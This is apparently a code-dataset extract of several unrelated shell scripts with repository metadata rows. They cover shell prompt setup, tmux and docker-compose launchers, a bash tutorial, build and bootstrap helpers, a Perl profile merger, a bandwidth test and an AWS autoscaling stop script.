PS1="\[\e[0;37m\]┌─[${root}\u\[\e[0;37m\]][\[\e[0;96m\]\h\[\e[0;37m\]][\[\e[0;32m\]\w\[\e[0;37m\]]\n\[\e[0;37m\]└──╼ \[\e[0m\]"
PS2="\[\e[0;37m\]• \[\e[0m\]"
# test -n "$SSH_CLIENT" && PS1="$(hostname|cut -b 1-3)" || PS1=
# PS1="${PS1}% "
# Bash tweaks for command history
shopt -s histappend
PROMPT_COMMAND='history -a'
# Use up and down for partial completion of yet typed command
bind '"\e[A": history-search-backward'
bind '"\e[B": history-search-forward'
bind '"\C-\e[A": previous-history'
bind '"\C-\e[B": next-history'
export TEXMFLOCAL=$HOME/.local/share/texmf
export LC_ALL=C
export SUDO_EDITOR="em"
# Add local ruby gem directory to path if ruby is install at all
hash ruby 2>/dev/null && export PATH="$(ruby -e 'print Gem.user_dir')/bin:$PATH"
source ~/.bash_aliases
| true |
21550e507449f390ab3b398ebc4cbdd1d573df80
|
Shell
|
Contactis/translations-manager
|
/tmux.sh
|
UTF-8
| 875 | 2.859375 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
#if your tmux counts from 1 instead of 0, change this
START_INDEX_NUMBER=0
SESSION="transman" # translation-manager
FOLDER_FRONTEND=$PWD # to assign to a variable
#create detached session named $SESSION
tmux new-session -d -s $SESSION
#split the pane horizontally in half
tmux splitw -h -p 50 -t $((START_INDEX_NUMBER+0))
#split both resulting panes vertically in half
tmux splitw -v -p 50 -t $((START_INDEX_NUMBER+0))
tmux selectp -t $((START_INDEX_NUMBER+0))
tmux send-keys "git log --graph --all --abbrev-commit --date=relative --format=format:'%C(bold red)%h%C(reset) %C(bold magenta)(%ar)%C(reset) %C(white)%s%C(reset) %C(bold blue) %an%C(reset)%C(auto)%d%C(reset)'" 'C-m'
tmux selectp -t $((START_INDEX_NUMBER+2))
tmux send-keys "gulp watch" 'C-m'
#assume support of 256 colors and attach indicated session
tmux -2 attach-session -t $SESSION
| true |
8cb2080cc3325dbed03a87148523d6c237536bf1
|
Shell
|
andrzejglobisz/rtl-test-task
|
/up-services.sh
|
UTF-8
| 4,741 | 4.03125 | 4 |
[] |
no_license
|
# Script runs services in 'PROD' mode by default
# Available parameters are:
# --mode <mode-name> - starts all services in 'DEV', 'QA' or 'PROD' mode
# --service-name <service-name> - starts specific service with its dependencies
# --down-only - stops and removes containers of running services
# --logs-only - displays logs output for all services or only for service specified by '--service-name' parameter
# --re-pull - pulls fresh images before starting containers
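# Example invocations (movies-api is a hypothetical compose service name):
#   ./up-services.sh --mode DEV --service-name movies-api
#   ./up-services.sh --re-pull
#   ./up-services.sh --down-only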
UNKNOWN_POSITIONAL_PARAMS=()
SERVICES=(
"nginx"
"services/scrapper-svc"
"services/movies-api"
)
function getDockerComposeOverrideFiles() {
local mode=${1:-prod}
local override_files=""
for service in "${SERVICES[@]}"; do
if [ ${mode} != "prod" ]; then
override_files+=\ -f\ ${service}/docker-compose.${mode}.yml
fi
done
printf "%s" "${override_files}"
}
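# e.g. getDockerComposeOverrideFiles dev returns
# " -f nginx/docker-compose.dev.yml -f services/scrapper-svc/docker-compose.dev.yml -f services/movies-api/docker-compose.dev.yml"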
while [ "$#" -gt 0 ]; do
key="$1"
case $key in
--mode)
MODE="$2"
shift # past parameter
shift # past value
if [ -z "${MODE-false}" ]; then
printf '%s\n' "Value for '--mode' parameter is required!"
printf '%s\n' "Available modes are 'DEV', 'QA' or 'PROD'"
exit 1
fi
;;
--service-name)
SERVICE_NAME="$2"
shift # past parameter
shift # past value
if [ -z "${SERVICE_NAME-false}" ]; then
printf '%s\n' "Value for '--service-name' parameter is required!"
exit 1
fi
;;
--down-only)
DOWN="$1"
shift # past parameter
;;
--logs-only)
LOGS="$1"
shift # past parameter
;;
--re-pull)
RE_PULL="$1"
shift # past parameter
;;
*) # unknown option
UNKNOWN_POSITIONAL_PARAMS+=("$1")
shift # past parameter
;;
esac
done
if [ "${#UNKNOWN_POSITIONAL_PARAMS[@]}" -ne 0 ]; then
printf '%s\n' "Unrecognized parameters: '${UNKNOWN_POSITIONAL_PARAMS[*]}'"
printf '%s\n' "Available parameters are:"
printf '%s\n' "--mode <mode-name> - starts all services in 'DEV', 'QA' or 'PROD' mode"
printf '%s\n' "--service-name <service-name> - specifies service that should be started or for which logs should be displayed"
printf '%s\n' "--down-only - stops and removes containers of running services"
printf '%s\n' "--logs-only - displays logs output for all services or only for service specified by '--service-name' parameter"
printf '%s\n' "--re-pull - pulls fresh images before starting containers"
exit 0
fi
DOCKER_COMPOSE_CONFIG="docker-compose -f docker-compose.yml"
DOCKER_COMPOSE_UP_OPTIONS=""
case $MODE in
DEV)
printf '%s\n' "Mode: ${MODE}"
DOCKER_COMPOSE_CONFIG+=$(getDockerComposeOverrideFiles dev)
DOCKER_COMPOSE_UP_OPTIONS="--build --force-recreate"
;;
QA)
printf '%s\n' "Mode: ${MODE}"
DOCKER_COMPOSE_CONFIG+=$(getDockerComposeOverrideFiles qa)
DOCKER_COMPOSE_UP_OPTIONS="--force-recreate -d"
;;
PROD | *)
printf '%s\n' "Mode: PROD"
DOCKER_COMPOSE_CONFIG+=$(getDockerComposeOverrideFiles)
DOCKER_COMPOSE_UP_OPTIONS="--force-recreate -d"
;;
esac
DOCKER_COMPOSE_DOWN=("${DOCKER_COMPOSE_CONFIG}" "down --remove-orphans")
if [ "${DOWN}" == "--down-only" ]; then
printf '%s\n' "Stopping containers, removing containers and networks ..."
printf '%s\n' "Running command: ${DOCKER_COMPOSE_DOWN[*]}"
eval "${DOCKER_COMPOSE_DOWN[@]}"
exit 0;
fi
DOCKER_COMPOSE_LOGS=("${DOCKER_COMPOSE_CONFIG}" "logs --no-color" "${SERVICE_NAME}")
if [ "${LOGS}" == "--logs-only" ]; then
printf '%s\n' "Displaying logs output ..."
printf '%s\n' "Running command: ${DOCKER_COMPOSE_LOGS[*]}"
eval "${DOCKER_COMPOSE_LOGS[@]}"
exit 0;
fi
DOCKER_COMPOSE_UP=("${DOCKER_COMPOSE_CONFIG}" "up" "${DOCKER_COMPOSE_UP_OPTIONS}")
DOCKER_COMPOSE=(
"${DOCKER_COMPOSE_DOWN[@]}" "&&"
"${DOCKER_COMPOSE_UP[@]}"
)
DOCKER_COMPOSE_PULL=("${DOCKER_COMPOSE_CONFIG}" "pull")
if [ "${RE_PULL}" == "--re-pull" ]; then
printf '%s\n' "Enforced pull of fresh images ..."
DOCKER_COMPOSE=("${DOCKER_COMPOSE[@]:0:3}" "${DOCKER_COMPOSE_PULL[@]}" "&&" "${DOCKER_COMPOSE[@]:3}")
fi
if [ "${SERVICE_NAME:=false}" != "false" ]; then
printf '%s\n' "Starting service: ${SERVICE_NAME} ..."
DOCKER_COMPOSE=("${DOCKER_COMPOSE[@]}" "${SERVICE_NAME}")
else
printf '%s\n' "Starting all services ..."
fi
printf '%s\n' "Running command: ${DOCKER_COMPOSE[*]}"
eval "${DOCKER_COMPOSE[@]}"
| true |
e4b3d34b844cf1161bb424550bd8baabcd6b119e
|
Shell
|
CallumWalley/NeSI_Interactive_Introduction
|
/00-Bash_Basics/source_me
|
UTF-8
| 2,275 | 3.59375 | 4 |
[] |
no_license
|
#!/bin/bash
source "/home/cwal219/training/.common"
intro () {
STEP="0"
cd "~/"
printf "${F_HEADR} ___ ___ ____ _ ____ _ \n / _ \ / _ \ _ | _ \ | | | _ \ (_) \n| | | | | | | (_) | |_) | __ _ ___| |__ | |_) | __ _ ___ _ ___ ___ \n| | | | | | | | _ < / _| / __| '_ \ | _ < / _| / __| |/ __/ __|\n| |_| | |_| | _ | |_) | (_| \__ \ | | | | |_) | (_| \__ \ | (__\__ \\ \n \___/ \___/ (_) |____/ \__,_|___/_| |_| |____/ \__,_|___/_|\___|___/\n${F_DEFAULT}\n"
press_2_cont "First of all lets find out where we are on the cluster.\n"
printf "${F_CODE}pwd${F_DEFAULT} stands for 'Print Working Directory'\n"
printf "Try typing ${F_CODE}pwd${F_DEFAULT} into the command line now.\n"
}
#ALIASES
pwd () {
/usr/bin/pwd
if [ "${STEP}" == "0" ]; then
press_2_cont "\nThis is your home directory, your home directory should be used for non-project related data.\n\n"
#sleep 3s
press_2_cont "Next we will learn how to copy files from different directories.\n"
#sleep 3s
printf "Try copying the rest of the tutorial to your home directory with:"
printf "\n\n\t${F_CODE}cp -r ${TUT_PATH} ~/${F_DEFAULT}\n\n\t${F_NOTE}'-r' : Allows copying of folders.\n\t'~/' : Refers to your home directory.\n${F_DEFAULT}"
STEP="1"
fi
return 0
}
cp () {
/usr/bin/cp "$@"
if [ -d "${HOME}/training" ] && [ "${STEP}" == "1" ]; then
#if [ "$1" == "-r" ] && [ "$2" == "${TUT_PATH}" ] && [ "$3" == "${HOME}/" ]; then
press_2_cont "\nWell done! You copied a folder."
printf "\nNow change your directory to the folder you just moved using:"
printf "\n\n\t${F_CODE}cd ~/training${F_DEFAULT}\n"
STEP="2"
fi
return 0
}
cd () {
builtin cd "$@"  # an external cd cannot change the shell's working directory
if [ "${PWD}" == "${HOME}/training" ] && [ "${STEP}" == "2" ]; then
press_2_cont "\nTo see what is in the current directory type...."
printf "${F_GOOD}Congrats!${F_DEFAULT} Thats the end of this tutorial, to start the next one type:\n"
printf "\n\n\t${F_CODE}source ${TUT_PATH}/01-Loading_Software/source_me${F_DEFAULT}\n"
end_of_tut
fi
return 0
}
# sacct () {
# /opt/slurm/17.11.7/bin/sacct
# sleep 1s
# return 0
# }
#alias sacct="sacct"
####################
intro
| true |
4289db3372bca07d6df39b3c664517ef073c1d7b
|
Shell
|
adrianwebb/cm-bootstrap
|
/bootstrap.sh
|
UTF-8
| 2,967 | 4.0625 | 4 |
[] |
no_license
|
#!/bin/bash
#-------------------------------------------------------------------------------
#
# bootstrap.sh
#
#-------------------------------------------------------------------------------
# Help
if [ -z "$HELP" ]
then
export HELP="
This script bootstraps a machine with all of the components (packages and
configurations) it needs to run the CM system.
Systems initialized:
* Base system - Hostname configured
- Hosts file initialized (if applicable)
- DNS configured
- System package updates
- Build package installation
* Git - Git packages installed
- GitHub added to known hosts
* Ruby - Rubinius 2.5.x packages installed
- Execution alternative configuration (if applicable)
- Ruby Gem options initialized
* Nucleon - Nucleon gem and dependencies installed
* CM - CM gem and dependencies installed
--------------------------------------------------------------------------------
Tested under Ubuntu 14.04 LTS
Licensed under GPLv3
See the project page at: http://github.com/adrianwebb/cm-bootstrap
Report issues here: http://github.com/adrianwebb/cm-bootstrap/issues
"
fi
if [ -z "$USAGE" ]
then
export USAGE="
usage: bootstrap.sh script_name ... | Names of bootstrap scripts to run [ ##_(>>script_name<<).sh ]
--------------------------------------------------------------------------------
[ -h | --help ] | Show usage information
"
fi
#-------------------------------------------------------------------------------
# Parameters
STATUS=0
SCRIPT_DIR="$(cd "$(dirname "$([ `readlink "$0"` ] && echo "`readlink "$0"`" || echo "$0")")"; pwd -P)"
SHELL_LIB_DIR="$SCRIPT_DIR/lib/bash"
source "$SHELL_LIB_DIR/load.sh" || exit 100
#---
PARAMS=`normalize_params "$@"`
parse_flag '-h|--help' HELP_WANTED
# Standard help message.
if [ "$HELP_WANTED" ]
then
echo "$HELP"
echo "$USAGE"
exit 0
fi
if [ $STATUS -ne 0 ]
then
echo "$USAGE"
exit $STATUS
fi
#-------------------------------------------------------------------------------
# Utilities
BOOTSTRAP_SCRIPTS="$SCRIPT_DIR/os/$OS/tasks/*.sh"
#---
# Source library functions
for file in "$SCRIPT_DIR"/lib/*.sh
do source $file || exit 150
done
# Source configuration file
CONFIG_SCRIPT="$SCRIPT_DIR/os/$OS/config.sh"
source "$CONFIG_SCRIPT" || exit 200
#---
for SCRIPT in $BOOTSTRAP_SCRIPTS
do
SCRIPT_MATCH=''
if [[ "$SCRIPT" =~ _(.+)\.sh$ ]]
then
SCRIPT_NAME="${BASH_REMATCH[1]}"
if [ ! -z "$PARAMS" ]
then
for NAME in ${PARAMS[@]}
do
if [[ "$NAME" == "$SCRIPT_NAME" ]]
then
SCRIPT_MATCH='1'
fi
done
else
SCRIPT_MATCH='1'
fi
fi
if [ ! -z "$SCRIPT_MATCH" ]
then
echo "Processing: $SCRIPT"
source "$SCRIPT"
STATUS=$?
fi
if [ $STATUS -ne 0 ]
then
exit $STATUS
fi
done
exit $STATUS
| true |
e0da149936a26b619970d53184394cf427a5318f
|
Shell
|
nxt-lab/obnpy
|
/test/runtest.sh
|
UTF-8
| 349 | 2.640625 | 3 |
[] |
no_license
|
#!/bin/bash
# need to set obnchai and smnchai aliases before using them
shopt -s expand_aliases
source ~/.bash_profile
echo "Starting python OBN interface test"
echo "running chaiscript node..."
obnchai othernode.ons &
echo "run python node..."
python extnode.py &
echo "running simulation manager node..."
smnchai testpy.oss
echo "test finished"
| true |
b5b5232d22454108a92700daafc42cbfb90002c5
|
Shell
|
atn34/blog
|
/deploy.sh
|
UTF-8
| 602 | 3.3125 | 3 |
[] |
no_license
|
#! /bin/sh
REV=HEAD
SHA=$(git rev-list $REV | head -1)
DEPLOYDIR=/tmp/blog-deploy-$SHA
SOURCEDIR=/tmp/blog-source-$SHA
[email protected]:atn34/atn34.github.io.git
GITHUBSRC=atn34/blog
trap "rm -rf $DEPLOYDIR $SOURCEDIR" EXIT
mkdir $DEPLOYDIR
mkdir $SOURCEDIR
git clone $DEPLOYREMOTE $DEPLOYDIR
(cd $DEPLOYDIR && git ls-files | xargs rm -f)
git archive --format=tar $REV | (cd $SOURCEDIR && tar xf -)
./render.py build --dest $DEPLOYDIR --source $SOURCEDIR/content || exit
(cd $DEPLOYDIR && \
git add . && \
git commit -m "build of $GITHUBSRC@$SHA" && \
git push origin master)
| true |
6adaa8b40d2d47cada8b50232fc897f985d128af
|
Shell
|
misostack/nodejs-cs1-chatapp-api
|
/setup.sh
|
UTF-8
| 1,185 | 3.65625 | 4 |
[] |
no_license
|
#!/usr/bin/env bash
echo ".................................."
echo "...............START..............."
echo ".................................."
from=.env.sample
declare -a List=(
"env"
)
for env in "${List[@]}"
do
to=".$env"
if test -f $to; then
echo "$to file exists. You will need to add any new config lines manually."
else
echo -e "Copy $from to $to"
search="ENV_NAME"
replace="$env"
sed "s/$search/$replace/g" $from > $to
fi
done
firebaseServiceAccountKeyFile=firebaseServiceAccountKey.json
if test -f $firebaseServiceAccountKeyFile; then
echo "$firebaseServiceAccountKeyFile already existed!"
else
echo -e "Copy firebaseServiceAccountKey.sample.json to firebaseServiceAccountKey.json"
cp "firebaseServiceAccountKey.sample.json" "firebaseServiceAccountKey.json"
echo ".................................."
echo "You must replace firebaseServiceAccountKey.json with your service account key in firebase console."
fi
echo "..............WARNING............."
echo "To allow setup on Heroku you must set these ENV params"
cat $from
echo ""
echo "..............DONE..............."
echo ".................................."
| true |
0220a7282d807688b840a05ade1b5ee0dba5d902
|
Shell
|
invisibleboy/mycompiler
|
/scripts/gen_profile_merge_lcode
|
UTF-8
| 6,579 | 2.703125 | 3 |
[
"NCSA"
] |
permissive
|
#!/bin/sh
perl -x $0 "$@"
exit $?
#!/usr/bin/perl
###############################################################################
##
## Illinois Open Source License
## University of Illinois/NCSA
## Open Source License
##
## Copyright (c) 2004, The University of Illinois at Urbana-Champaign.
## All rights reserved.
##
## Developed by:
##
## IMPACT Research Group
##
## University of Illinois at Urbana-Champaign
##
## http://www.crhc.uiuc.edu/IMPACT
## http://www.gelato.org
##
## Permission is hereby granted, free of charge, to any person
## obtaining a copy of this software and associated documentation
## files (the "Software"), to deal with the Software without
## restriction, including without limitation the rights to use, copy,
## modify, merge, publish, distribute, sublicense, and/or sell copies
## of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimers.
##
## Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimers in
## the documentation and/or other materials provided with the
## distribution.
##
## Neither the names of the IMPACT Research Group, the University of
## Illinois, nor the names of its contributors may be used to endorse
## or promote products derived from this Software without specific
## prior written permission. THE SOFTWARE IS PROVIDED "AS IS",
## WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
## LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
## PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES
## OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
## OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
## OR THE USE OR OTHER DEALINGS WITH THE SOFTWARE.
##
###############################################################################
#
# Merges the Lcode profiles prior to annotation.
#
# Script written by Erik Nystrom, Matthew Merten, and Wen-mei Hwu 08/01
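#
# Usage (inferred from the argument loop below): pass one or more Lcode
# profile files; the merged profile is written to stdout, e.g.
#   gen_profile_merge_lcode run1.profile run2.profile > merged.profile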
$file_count = 0;
# BUILD THE FILE HANDLE LIST
@fh_list = ();
foreach $param (@ARGV)
{
$file_handle = newopen($param);
die "Could not open $param\n" if (!file_handle);
push(@fh_list, $file_handle);
$file_count++;
print STDERR ">> opened $param\n";
}
$last_file = $file_count - 1;
$done = 0;
while(!$done) {
for ($j=0; $j < $file_count; $j++) {
$file_handle = $fh_list[$j];
if (!($_ = <$file_handle>))
{
die "Should end on j=0" if ($j != 0);
$done=1;
last;
}
if ($j == 0)
{
$weight = 0;
$weight2 = 0;
$cbnum = 0;
$types = 0;
}
if (/\(count\s+(\d+)/)
{
$weight = $weight + $1;
printf "(count %d)\n",$weight if ($j == $last_file);
}
elsif (/\(begin\s+(\w+)\s+(\d+.\d+)/)
{
$weight = $weight + $2;
printf "(begin $1 %f)\n",$weight if ($j == $last_file);
}
elsif (/\(end\s+(\w+)/)
{
print "(end $1)\n" if ($j == $last_file);
}
elsif (/\(cb\s+(\d+)\s+(\d+.\d+)/)
{
if ($j == 0)
{
$cbnum = $1;
}
else
{
die "lcb cb mismatch\n" if ($cbnum != $1);
}
$weight = $weight + $2;
printf " (cb %d %f)\n",$cbnum,$weight if ($j == $last_file);
}
elsif (/\(b\s+(\d+)\s+(\d+.\d+)\s+(\d+.\d+)/)
{
$weight = $weight + $2;
$weight2 = $weight2 + $3;
printf " (b $1 %f %f)\n",$weight,$weight2 if ($j == $last_file);
}
elsif (/\(pj\s+(\d+)\s+(\d+.\d+)\s+(\d+.\d+)/)
{
$weight = $weight + $2;
$weight2 = $weight2 + $3;
printf " (pj $1 %f %f)\n",$weight,$weight2 if ($j == $last_file);
}
elsif (/\(j\s+(\d+)\s+(\d+.\d+)/)
{
$weight = $weight + $2;
printf " (j $1 %f)\n",$weight if ($j == $last_file);
}
elsif (/\(lcb\s+(\d+)\s+(\d+.\d+)\s+(\d+)\s+(\d+)/)
{
$types = $3;
if ($j == 0)
{
#Clear hash before first use
undef %type_hash;
$cbnum = $1;
$weight = $2;
$hmmm = $4;
}
else
{
die "lcb cb mismatch\n" if ($cbnum != $1);
$weight += $2;
}
#Add keys to hash
for ($i=0; $i < $types; $i++)
{
$_ = <$file_handle>;
if (/\s*(\d+)\s+(\d+.\d+)/)
{
$type_hash{$1} += $2;
#print "$1 = $type_hash{$1}\n";
}
else
{
die "[$_] unexpected lcd params\n";
}
}
#Dump on last file
if ($j == $last_file)
{
$types = keys %type_hash;
print " (lcb $cbnum $weight $types $hmmm\n";
@tmplist = keys %type_hash;
@tmplist = sort numerically @tmplist;
foreach $key (@tmplist)
{
printf " ( $key %f)\n",$type_hash{$key};
}
print (" )\n");
}
$_ = <$file_handle>;
}
elsif (/\(jrg\s+(\d+)\s+(\d+.\d+)/)
{
if ($j == 0)
{
#Clear hash before first use
undef %type_hash;
$cbnum = $1;
$weight = $2;
}
else
{
die "jr mismatch\n" if ($cbnum != $1);
$weight += $2;
}
#Add keys to hash
$jrg_done = 0;
while (!($jrg_done))
{
$_ = <$file_handle>;
if (/\s*(\d+)\s+(\d+.\d+)/)
{
$type_hash{$1} += $2;
#print "$1 = $type_hash{$1}\n";
}
elsif(/^\s*\)/)
{
$jrg_done = 1;
}
else
{
die "[$_] unexpected jrg params\n";
}
}
#Dump on last file
if ($j == $last_file)
{
$types = keys %type_hash;
print " (jrg $cbnum $weight\n";
@tmplist = keys %type_hash;
@tmplist = sort numerically @tmplist;
foreach $key (@tmplist)
{
printf " ( $key %f)\n",$type_hash{$key};
}
print (" )\n");
}
}
else
{
die "Unknown token: $_";
}
}
}
sub numerically { $a <=> $b; }
sub newopen {
my $path=shift;
local *FH;
open(FH, $path) || return undef;
return *FH;
}
| true |
4153f38123eab43f4a281a8eab82dc3174a10e4e
|
Shell
|
moai/moai-community
|
/scripts/build-linux.sh
|
UTF-8
| 1,299 | 3.78125 | 4 |
[] |
no_license
|
#!/bin/bash
#
# Build script for GNU/Linux
# Usage: Run from Moai SDK's root directory:
#
# build-linux.sh
#
# You can change the CMake options using -DOPTION=VALUE
# Check moai-dev/cmake/CMakeLists.txt for all the available options.
#
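# A typical invocation (the MOAI_SDK_HOME value below is illustrative):
#
#   MOAI_SDK_HOME=~/moai-sdk ./build-linux.sh [lib-prefix]
#
# lib-prefix is optional and defaults to ../lib/linux relative to this script.
#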
set -e
if [ -z $1 ]; then
libprefix=`dirname $0`/../lib/linux
else
libprefix=$1
fi
mkdir -p $libprefix
libprefix=$(cd $libprefix; pwd)
cores=$(getconf _NPROCESSORS_ONLN)
: ${MOAI_SDK_HOME?"MOAI_SDK_HOME is not defined. Please set to the location of your MOAI SDK install (path)"}
pushd `dirname $0`/..
PITO_ROOT=$(pwd)
BUILD_DIR="build/build-linux"
if ! [ -d ${BUILD_DIR} ]; then
mkdir -p $BUILD_DIR
fi
cd $BUILD_DIR
# - This fix, "curl: sed not found in PATH. Cannot continue without sed."
# - Shells problems: fish,
if ! [ -e PATH_SEPARATOR ]; then
export PATH_SEPARATOR=:
fi
cmake \
-DBUILD_LINUX=TRUE \
-DMOAI_SDL=TRUE \
-DMOAI_SDK_HOME=${MOAI_SDK_HOME} \
-DMOAI_HTTP_SERVER=TRUE \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=$libprefix \
$PITO_ROOT/cmake/hosts/host-linux-sdl
cmake --build . --target install -- -j$cores
if [ ! -e "${PITO_ROOT}/bin/moai" ]; then
cp $libprefix/bin/moai $PITO_ROOT/bin/moai
fi
if [ ! -e "${MOAI_SDK_HOME}/util/moai" ]; then
cp $libprefix/bin/moai ${MOAI_SDK_HOME}/util/moai
fi
popd
exit 0
| true |
69b237eadae6ad6395ac6d9e5a2f2588d5ba14a9
|
Shell
|
Chingliu/WTL-DUI
|
/base/allocator/prep_libc.sh
|
UTF-8
| 1,378 | 3.5625 | 4 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# This script takes libcmt.lib for VS2005 and removes the allocation related
# functions from it.
#
# Usage: prep_libcmt.bat <VCInstallDir> <OutputFile>
#
# VCInstallDir is the path where VC is installed, typically:
# C:\Program Files\Microsoft Visual Studio 8\VC\
#
# OutputFile is the directory where the modified libcmt file should be stored.
#
LIBCMT="${1}\\libcmt.lib"
LIBCMTPDB="${1}\\libcmt.pdb"
OUTDIR=$2
OUTCMT="${2}\\libcmt.lib"
mkdir -p $OUTDIR
cp "$LIBCMT" "$OUTDIR"
cp "$LIBCMTPDB" "$OUTDIR"
# We'll remove the symbols based on paths found in either the VS2005 or VS2008
# libcmt.lib files.
LIBCMTSRCPATHVS2005="build\\intel\\mt_obj\\"
LIBCMTSRCPATHVS2008="f:\\dd\\vctools\\crt_bld\\SELF_X86\\crt\\src\\build\\INTEL\\mt_obj\\"
OBJFILES="malloc.obj free.obj realloc.obj new.obj delete.obj new2.obj delete2.obj align.obj msize.obj heapinit.obj expand.obj heapchk.obj heapwalk.obj heapmin.obj sbheap.obj calloc.obj recalloc.obj calloc_impl.obj new_mode.obj newopnt.obj"
for FILE in $OBJFILES
do
echo ${FILE}
LIB /NOLOGO /IGNORE:4006,4014,4221 /REMOVE:${LIBCMTSRCPATHVS2005}${FILE} $OUTCMT
LIB /NOLOGO /IGNORE:4006,4014,4221 /REMOVE:${LIBCMTSRCPATHVS2008}${FILE} $OUTCMT
done
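# Example invocation (illustrative path; $1 must be the directory that
# actually contains libcmt.lib):
#   ./prep_libc.sh "C:\Program Files\Microsoft Visual Studio 8\VC\lib" out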
| true |
3403551a2d0a09af86f3a5c5944d9287046f59e5
|
Shell
|
cbm-fles/flesnet
|
/contrib/bw_test
|
UTF-8
| 2,372 | 3.375 | 3 |
[] |
no_license
|
#!/bin/bash
#set -e
set -m
#debug
#set -x
ROOT_DIR="$(git rev-parse --show-toplevel)"
BINDIR=$ROOT_DIR/build
OUTFILE=result.log
FLIB_ADDR=01:00.0
PGEN_RATE=1
# size in steps of 1024ns
PGEN_MC_SIZE=100
FLIB_MC_LIMIT=1048576
BASE_EQID=0xF00
BUF_SIZE_EXP=28
LINK=(disable disable disable disable disable disable disable disable)
meassure () {
# configure FLIB
$BINDIR/flib_cfg -c /dev/null -l 2 -L flib_cfg.log -i ${FLIB_ADDR} \
-t $PGEN_MC_SIZE -r $PGEN_RATE \
--mc-size-limit $FLIB_MC_LIMIT \
--l0_source ${LINK[0]} --l0_eq_id ${BASE_EQID}0 \
--l1_source ${LINK[1]} --l1_eq_id ${BASE_EQID}1 \
--l2_source ${LINK[2]} --l2_eq_id ${BASE_EQID}2 \
--l3_source ${LINK[3]} --l3_eq_id ${BASE_EQID}3 \
--l4_source ${LINK[4]} --l4_eq_id ${BASE_EQID}4 \
--l5_source ${LINK[5]} --l5_eq_id ${BASE_EQID}5 \
--l6_source ${LINK[6]} --l6_eq_id ${BASE_EQID}6 \
--l7_source ${LINK[7]} --l7_eq_id ${BASE_EQID}7
# start FLIB Server
$BINDIR/flib_server -c /dev/null -L flib_server.log -i ${FLIB_ADDR} \
--data-buffer-size-exp $BUF_SIZE_EXP &
SERVER_PID=$!
# block till server is ready (remove if etcd is ready)
sleep 1
tail -f flib_server.log | while read LOGLINE
do
[[ "${LOGLINE}" == *"flib server started and running"* ]] && pkill -P $$ tail
done
echo "*** starting consumer ***"
$BINDIR/simple_consumer 0 2>&1 | tee -a $OUTFILE &
CONSUMER_PID=$!
echo "*** enabling readout ***"
$BINDIR/en_readout 0 > flib_info.log &
EN_0_PID=$!
wait $CONSUMER_PID
#kill -s SIGINT $EN_0_PID 2>/dev/null
#kill -s SIGINT $SERVER_PID 2>/dev/null
kill -s SIGINT $EN_0_PID
kill -s SIGINT $SERVER_PID
wait
}
rm $OUTFILE
echo -n "[" > $OUTFILE
MEAS=0
for NUM_LINKS in 1 2; do
echo "Measuring $NUM_LINKS links"
i=0
LINK=(disable disable disable disable disable disable disable disable)
while [ $i -lt $NUM_LINKS ]; do
LINK[$i]=pgen_near
let i=i+1
done
for PGEN_MC_SIZE in 10 80; do
echo "Measuring size $PGEN_MC_SIZE"
if [ $MEAS -ne 0 ]; then echo -n ", " >> $OUTFILE; fi
echo -n "{\"mc_size\": $PGEN_MC_SIZE, \"num_links\": $NUM_LINKS, \"Results\": " | tee -a $OUTFILE
meassure
echo -n "}" >> $OUTFILE
let MEAS=MEAS+1
done
done
echo "]" >> $OUTFILE
wait
exit 0
| true |
e9bc7439faa803ef635f12190f6201bd9a0fa22a
|
Shell
|
tommasop/dotfiles
|
/.config/yadm/bootstrap
|
UTF-8
| 260 | 2.8125 | 3 |
[] |
no_license
|
#!/bin/bash
# Update Ubuntu and get standard repository programs
./scripts/aptinstall.sh
# Run all programs/ install scripts
for f in scripts/programs/*.sh; do bash "$f" -H; done
# Get all upgrades
sudo apt upgrade -y
# See our zsh changes
source ~/.zshrc
| true |
550ed5507d91b03ce12d43b958ab83528544b6b1
|
Shell
|
chopark/CodeDeploy_NiFi
|
/autoscale_script/stop_autoscale.sh
|
UTF-8
| 605 | 3.984375 | 4 |
[] |
no_license
|
#!/bin/sh
## USAGE
## ./stop_autoscale.sh (target group)
#### e.g. (target group): 1, 2, 3, ...
SHELL=$0
if [ $# != 1 ]; then
echo "$SHELL: USAGE: $SHELL (target group)"
echo "$SHELL: e.g. (target group): 1, 2, 3, ..."
exit 1
fi
#Variables
target_group=$1
instance_limit=0
group_num=0
# Stop each group by setting its desired capacity to 0
while [ $group_num -lt $target_group ]; do
aws autoscaling set-desired-capacity --auto-scaling-group-name Edges_Group$group_num --desired-capacity $instance_limit --honor-cooldown
echo "$0: Stopped group$group_num"
group_num=$(($group_num+1))
done
| true |
c9451fb14fadb134fc18a2ef9961d661051cc6fc
|
Shell
|
JoshHilliker/Telemetry-Infra
|
/uc_scripts/dmesg_edac.sh
|
UTF-8
| 274 | 2.59375 | 3 |
[] |
no_license
|
#! /bin/bash
# Purpose: do a daily pull of dmesg to grab EDAC (Error Detection and Correction driver) data, for use with a machine-learning model for memory-failure prediction.
while /bin/true ; do
dmesg | grep EDAC >> $(hostname)_test.txt
sleep 86400 # 24 hours, to match the daily pull described above
done
| true |
e2c8b07a337d1f79c594ca5288ffbeffe92e0214
|
Shell
|
WabashOS/pfa-exp
|
/fed-overlay/root/util/pfa_exec
|
UTF-8
| 543 | 2.6875 | 3 |
[] |
no_license
|
#!/bin/sh
# This command executes the command in the PFA without interacting with cgroups.
# This command is not intended to be called directly (it's called by pfa_launch)
echo $$ > /sys/kernel/mm/pfa_stat
# Experiments run on core 1. This works best if the kernel cmdline includes
# isolcpus=1
# XXX This is causing a bus error on Fedora when run as a command or from a script. I need to try enabling cpuset in systemd and the kernel.
# taskset -p 0x2 $$
